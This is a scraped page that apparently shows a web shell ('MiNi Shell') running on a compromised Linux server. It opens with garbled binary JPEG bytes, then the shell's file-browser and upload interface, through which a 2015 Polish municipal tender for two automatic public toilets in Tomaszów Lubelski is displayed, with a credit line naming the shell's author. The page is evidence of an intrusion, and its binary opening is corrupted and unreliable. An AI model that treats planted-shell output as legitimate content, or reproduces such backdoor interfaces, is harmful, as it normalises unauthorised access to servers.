JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150316/56628-N-2015.html

<p class="kh_header"><b>Tomaszów Lubelski: REWITALIZACJA MIASTA TOMASZÓW LUBELSKI POPRZEZ REMONT ULICZEK STAREGO MIASTA ORAZ PARKU MIEJSKIEGO - DOSTAWA, TRANSPORT 
I MONTAŻ TOALET PUBLICZNYCH WRAZ Z WYPOSAŻENIEM</b><br>
<b>Numer ogłoszenia: 56628 - 2015; data zamieszczenia: 16.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA MIASTA TOMASZÓW LUBELSKI POPRZEZ REMONT ULICZEK STAREGO MIASTA ORAZ PARKU MIEJSKIEGO - DOSTAWA, TRANSPORT 
I MONTAŻ TOALET PUBLICZNYCH WRAZ Z WYPOSAŻENIEM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia obejmuje: dostawę, transport i montaż dwóch automatycznych toalet publicznych wraz z wyposażeniem. Dostarczone toalety powinny być zamontowane jako element nie trwale związany z gruntem na działce nr 279 ark. 12, ul. Rynek oraz działce 84/1 ark. 21, ul. Królewska w Tomaszowie Lubelskim.  Miejsca posadowienia toalet oraz wszystkie niezbędne przyłącza: woda, kanalizacja i energia elektryczna przygotuje Zamawiający we własnym zakresie i na własny koszt. 
Wykonawca na własny koszt wykona montaż toalet wraz z  podłączenie każdego elementu z istniejącymi przyłączami wodno kanalizacyjnymi i elektrycznymi. 

a)	Charakterystyka obiektu
-	Konstrukcja toalety powinna być wykonana z wysokiej jakości materiałów zapewniających trwałość oraz odporność na czynniki wewnętrzne, zewnętrzne i promieniowanie UV,
-	Budynek toalet powinien spełniać wymogi w zakresie izolacji cieplnej oraz inne wymagania związane z oszczędnością energii określone w Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki morskiej z dnia: 05 lipca 2013r. (Dz. U. 2013, poz. 926). 

b)	Zewnętrzne wyposażenie toalety
-	Automatyczne drzwi przesuwne ze wzmocnionej wysoko gatunkowej stali nierdzewnej o szerokości 90cm w świetle, zintegrowane z elektronicznym panelem wrzutowym na monety wyświetlającym stany toalety: wolne, zajęte, nieczynne, umożliwiającym automatyczne otwieranie drzwi po naciśnięciu przycisku,
-	Drzwi wejściowe do pomieszczenia technicznego o szerokości 80cm, stalowe malowane proszkowo,
- 	Panel wrzutowy powinien być odporny na akty wandalizmu. W zależności od potrzeb klienta istnieje możliwość ustawienia każdej wielkości wrzutowej nominału z informacją na ekranie o sumie wrzuconych monet do wielkości zadanej lub ustawienia bezpłatnego wejścia
-	Oświetlenie LED z zewnątrz wyposażone w czujnik zmierzchu,
-	Podświetlone symbole (piktogramy) toalety, powinny być podświetlone światłem ledowym (informujące przechodniów o obiekcie),
-	Sygnalizacyjny system przeciwpożarowy (akustyczny - świetlny), 
-	Elewacja zewnętrzna toalety powinna być wykonana z płyt granitowych,
-	Kolor toalet Zamawiający ustali z wybranym Wykonawca przed podpisaniem umowy,

c)	Wewnętrzne wyposażenie toalety
-	Podłoga wykończona powinna być specjalnie wzmocnioną antypoślizgową nawierzchnią (kolorystyka zostanie ustalona przed podpisaniem umowy),
-	Światło wewnątrz toalety powinno włączane się automatycznie po otwarciu drzwi wejściowych,
-	Awaryjne światło włączające się w przypadku zaniku prądu,
-	Funkcja ręcznego otwierania drzwi wewnątrz toalety umożliwiająca swobodne wyjście w sytuacji awaryjnej również w przypadku braku prądu,
-	Sygnał awaryjny akustyczny - świetlny uruchamiany od wewnątrz przyciskiem ŻĄDANIE POMOCY,
-	Sensory ruchu bezpieczeństwa wykrywające obecność osób w pomieszczeniu toalety,
-	Czasowy ogranicznik przebywania w toalecie,
-	Wyświetlacz wewnętrzny toalety informujący o upływie czasu przebywania,
-	Czujnik temperatury regulujący automatycznie temperaturę wewnątrz pomieszczenia,
-	Konwektorowe ogrzewanie elektryczne-kurtyna powietrzna lub ogrzewanie podłogowe na powierzchni całego budynku z termostatem sterowanym przez administratora budynku,
-	Automatyczne bezdotykowe spłukiwanie muszli WC,
-	Muszla WC ze stali kwasoodpornej, nierdzewnej dla osób niepełnosprawnych,
-	Automatyczne ciśnieniowe mycie, dezynfekcja i suszenie całej muszli ustępowej lub muszli ustępowej wraz z deską sedesową, 
-	Automatyczny moduł umywalkowy ze stali nierdzewnej wyposażony w bezdotykowy podajnik mydła, ciepłej wody i suszenia rąk,
-	Podgrzewacz wody,
-	Lustro ze wzmocnionej stali nierdzewnej odpornej na akty wandalizmu,
-	Kosz na śmieci z funkcją anty p.poż ze stali kwasoodpornej, nierdzewnej zamontowany w pomieszczeniu publicznym,
-	Pisuar,
-	Podajnik papieru toaletowego odporny na akty wandalizmu,
-	Niklowany wzmocniony wieszak na ubrania,
-	Graficzne oznaczenie funkcji użytkowych wewnątrz toalety,
-	Instrukcja użytkowania toalety w trzech językach: polskim, niemieckim, angielskim,
-	Instrukcja postępowania w sytuacjach awaryjnych w trzech językach: polskim, niemieckim, angielskim,
-	Wykaz telefonów alarmowych,
 
d)	Przystosowanie dla osób niepełnosprawnych
-	Drzwi o szerokości 90 cm w świetle,
-	Umywalka umieszczona na odpowiednie wysokości,
-	Podchwyty dla niepełnosprawnych wykonane ze stali kwasoodpornej nierdzewnej, zabezpieczone przed odkręceniem od strony pomieszczenia technicznego,
-	Umiejscowienie wszystkich przycisków i urządzeń na wysokościach odpowiadających osobom na wózkach inwalidzkich,

e)	Wyposażenie pomieszczenia technicznego
-	Toaleta powinna posiadać osobne pomieszczenie techniczne z oddzielnym wejściem zewnętrznym, w którym to znajduje się automatyka sterowania systemem komputerowym umożliwiającym ustawienie poszczególnych funkcji działania toalety,
- 	Wielkość opłaty za toaletę,
-	Częstotliwość mycia i suszenia deski sedesowej,
-	Ustawienie czasu przebywania w toalecie,
-	Pomiar opłat za toaletę,
-	Czujnik przeciwpożarowy,
-	Zawór wody ze złączką do podłączenia węża.

Zamawiając zastrzega sobie że Wszystkie zastosowane materiały powinny posiadać wymagane atesty, aprobaty techniczne, certyfikaty oraz dopuszczenia stosowane w Polsce.

2.	Zamawiający wymaga, aby oferta obejmowała całość przedmiotu zamówienia. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji zadania i w jego okolicy w celu dokonania oceny informacji przekazywanych w ramach przedmiotowego postępowania przez Zamawiającego. W związku z powyższym wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny.  
3.	Wszelkie niezbędne materiały do wykonania zamówienia zabezpiecza Wykonawca. Roboty należy wykonać zachowaniem warunków wynikających z norm technicznych, z wymogami sztuki budowlanej. 
4.	Wykonawca zobowiązany  będzie również do: 
a) 	odpowiedniego ogrodzenia, oznakowania i urządzenia terenu montażu toalet, w tym zaplecza budowy dla potrzeb własnych, 
b) 	zabezpieczenia terenu na którym będzie odbywał się montażu toalet zgodnie z wymogami obowiązujących przepisów dotyczących bezpieczeństwa i higieny pracy oraz  przeprowadzania w trakcie realizacji zamówienia wszelkich czynności związanych z bezpieczeństwem na terenie budowy,  
c)	naprawy na własny koszt wszystkich elementów które ulegną uszkodzeniu w czasie prowadzenia prac montażowych,  
d)	ponoszenia w okresie realizacji montażu kosztów eksploatacyjnych związanych z realizowanym przedmiotem zamówienia, 
e)	przeprowadzenia rozruchu urządzeń i systemów zainstalowanych w ramach realizacji przedmiotu zamówienia, 
f)	komisyjnego przekazania przedmiotu umowy przy udziale zainteresowanych stron i organów, a także pokrycia kosztów z tym związanych, 
g)	uczestniczenia w przeglądach gwarancyjnych,
h)	wykonania wszystkich czynności, także nie przewidzianych wprost w umowie, związanych z pełnieniem funkcji wykonawcy w celu prawidłowego wykonania przedmiotu zamówienia;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.55.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zainteresowany postępowaniem o udzielenie zamówienia publicznego wniesie wadium w wysokości: 5 000,00 zł (słownie: pięć tysięcy złotych),
2.	Wadium można wnieść w formie:
a)	pieniądza na konto zamawiającego,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5, pkt. 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz.275 z późn. zm).
8.3.	Wadium w pieniądzu należy wnieść w terminie złożenia ofert, tj. do 25.03.2015r. do godz. 10:00 na konto Nr 82 2030 0045 1110 0000 0063 8150 w Banku Gospodarki Żywnościowej SA Oddział w Tomaszowie Lubelskim, dołączając ksero dowodu wpłaty wadium do oferty. 
4.	Za wadium skutecznie wniesione przelewem na wyżej wskazany rachunek bankowy, Zamawiający uznaje wadium, które najpóźniej przed upływem terminu składania ofert będzie znajdować się na rachunku zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.
5.	Dowód wniesienia wadium w formie innej niż w pieniądzu powinien być dołączony do oferty w postaci kopii lub oryginału.
6.	Wadium wnoszone w innej formie niż pieniądzu winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie zamawiającego.
7.	Zamawiający zwraca wadium wszystkim Wykonawcom zgodnie z art. 46 ustawy Pzp niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostało wybrana jako najkorzystniejsza.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46, ust.4a oraz ust.5 ustawy Pzp, chyba że wykonawca udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu,  o którym 	mowa w pkt.6.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu,  o którym 	mowa w pkt.6.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu,  o którym 	mowa w pkt.6.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu,  o którym 	mowa w pkt.6.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony przez Wykonawców, którzy ubezpieczeni są od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 zł. brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres Gwarancji - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień umowy (art.144 ust.1 ustawy Prawo zamówień publicznych) i określa warunki tej zmiany w zakresie:  
a)	zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego; 
b) 	wystąpienia konieczności wykonania zamówień dodatkowych, których realizacja będzie miała wpływ na termin wykonania przedmiotu umowy; 
d)	Zmiany terminu realizacji przedmiotu zamówienia, w przypadku : 
- 	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego. 
-	z powodu działania siły wyższej, uniemożliwiającej wykonanie dostawy w określonym pierwotnie terminie, o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, 
-	konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy  jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego o czas proporcjonalny do zmniejszonego zakresu, 
-	konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań, 
2. Wszelkie zmiany winny być dokonane w interesie Zamawiającego i Wykonawcy oraz wymagają ich obopólnej zgody dla prawidłowego wykonania przedmiotu zamówienia.           
	W przypadku wystąpienia sytuacji wymienionych wyżej kierownik budowy sporządzą protokół konieczności zmian czasu lub sposobu realizacji przedmiotu zamówienia w którym przytoczy argumenty za tym przemawiające w oparciu o zaistniałą nieprzewidzianą sytuację, sporządzą kosztorys robót zamiennych, będący załącznikiem do protokołu który musi zostać zaakceptowany przez Zamawiającego i Wykonawcę.  Zmiany winny być sporządzone   
w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tomaszowie  Lubelskim, ul. Lwowska 57, pokój Nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2015 godzina 10:00, miejsce: Urząd Miasta w Tomaszowie  Lubelskim, ul. Lwowska 57, pokój Nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest w ramach Konkursu 03/RPOWL/3.2/2010, Działania 3.2. Rewitalizacja zdegradowanych obszarów miejskich RPO WL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com